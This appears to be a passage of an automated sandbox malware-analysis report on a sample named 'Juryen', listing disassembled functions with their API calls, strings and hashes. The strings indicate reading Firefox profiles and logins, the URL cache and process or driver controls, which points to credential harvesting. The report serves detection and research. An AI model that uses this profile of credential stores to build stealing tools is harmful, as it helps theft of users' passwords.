                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                    Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                    • memset.MSVCRT ref: 00404200
                                                                    • memset.MSVCRT ref: 00404215
                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 0040426E
                                                                    • memset.MSVCRT ref: 004042CD
                                                                    • memset.MSVCRT ref: 004042E2
                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                    • API String ID: 2454223109-1580313836
                                                                    • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                    • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                    Function 0041352F Relevance: 33.3, APIs: 9, Strings: 10, Instructions: 41libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll$p+vw@Fvw@Bvw
                                                                    • API String ID: 667068680-772928780
                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                    Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                    • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                    • API String ID: 4054529287-3175352466
                                                                    • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                    • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                    Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                    • API String ID: 3143752011-1996832678
                                                                    • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                    • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    • API String ID: 1607361635-601624466
                                                                    • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                    • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 2000436516-3842416460
                                                                    • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                    • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                    • String ID:
                                                                    • API String ID: 1043902810-0
                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                    • free.MSVCRT ref: 0040E49A
                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                    • memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E3EC
                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E407
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E422
                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,771B2EE0), ref: 0040E43D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                    • API String ID: 3849927982-2252543386
                                                                    • Opcode ID: 838671905a2ba7d036ea7a94e6c5834168b5a6369d114958391e5d750bd87816
                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                    • Opcode Fuzzy Hash: 838671905a2ba7d036ea7a94e6c5834168b5a6369d114958391e5d750bd87816
                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                    • API String ID: 2899246560-1542517562
                                                                    • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                    • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                    • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                    • API String ID: 3330709923-517860148
                                                                    • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                    • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                    • memset.MSVCRT ref: 0040806A
                                                                    • memset.MSVCRT ref: 0040807F
                                                                    • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                    • memset.MSVCRT ref: 004081E4
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                    • String ID: logins$null
                                                                    • API String ID: 2148543256-2163367763
                                                                    • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                    • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                    • memset.MSVCRT ref: 004085CF
                                                                    • memset.MSVCRT ref: 004085F1
                                                                    • memset.MSVCRT ref: 00408606
                                                                    • strcmp.MSVCRT ref: 00408645
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                    • memset.MSVCRT ref: 0040870E
                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
